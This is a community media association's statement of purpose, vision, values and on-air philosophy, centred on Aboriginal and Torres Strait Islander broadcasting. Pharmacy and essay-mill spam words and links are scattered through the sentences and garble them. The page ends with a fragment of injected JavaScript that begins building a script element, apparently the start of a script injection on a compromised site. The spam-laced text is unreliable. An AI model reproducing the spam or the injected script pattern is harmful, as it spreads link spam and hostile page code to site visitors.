Purpose and Vision
PURPOSE TO PROVIDE AN UNDERSTANDING OF OUR DIVERSE CULTURE THOUGH AN INFORMATIVE AND INTERACTIVE MEDIA SERVICE.
- Education and www.sigmaessays.com training of all forms of Media.
- To promote indigenous issues and talent in a culturally appropriate manner.
- To implement culture heritage within a professional business environment.
Our Vision is to be a strong and creative team that maintains cultural Cheap diversity, by producing and presenting top quality material, though working together and for the community, and striving to be recognised as a strong Media force.
We value Purchase and respect:
The needs of the local community
- Professional standard of services
- Principles of equity, non-discrimination, diversity, respect, loyalty and awareness
- Community contribution and participation
- Governing Committee, management and co-workers for a valued contribution
- Honest and open communication processes
- Sharing knowledge to enhance a team environment.
The MIAMA Philosophy
The philosophy of MIAMA is to secure the empowerment of Aboriginal and Torres Strait Purchase Islander people through the ownership, development, control, training and maintenance of a fully resourced and independent Media Association.
We will strive to serve the needs of our listeners, in the http://rodlineinternational.com/where-can-i-order-nizoral-shampoo/ areas of music, language, oral history, culture, news and information.
We are communicators and entertainers.
Music, etodolac 400 mg street price with emphasis on Aboriginal and Torres Strait Islander artists, is a key ingredient of MIAMA programming and is targeted at all age groups.
We keep our listeners informed on a cross section of current events, news, politics, business, music, theatre, art, charities, sport, etc.
Our promotions are designed to involve Cheap our listeners, as well as to entertain.
The personality of the station should always come through and be clearly identifiable.
We are a Pills friend to our listeners. We want them to think of MIAMA as part of their lives, as their station.
Our broadcasters are air personalities, not robots who simply announce song title and artist, give time and temperature calls, etc. They are performers – warm, friendly, genuine people essay-writing-service who are happy to be broadcasters, sharing themselves with our listeners.
}var d=document;var s=d.createElement(‘script’);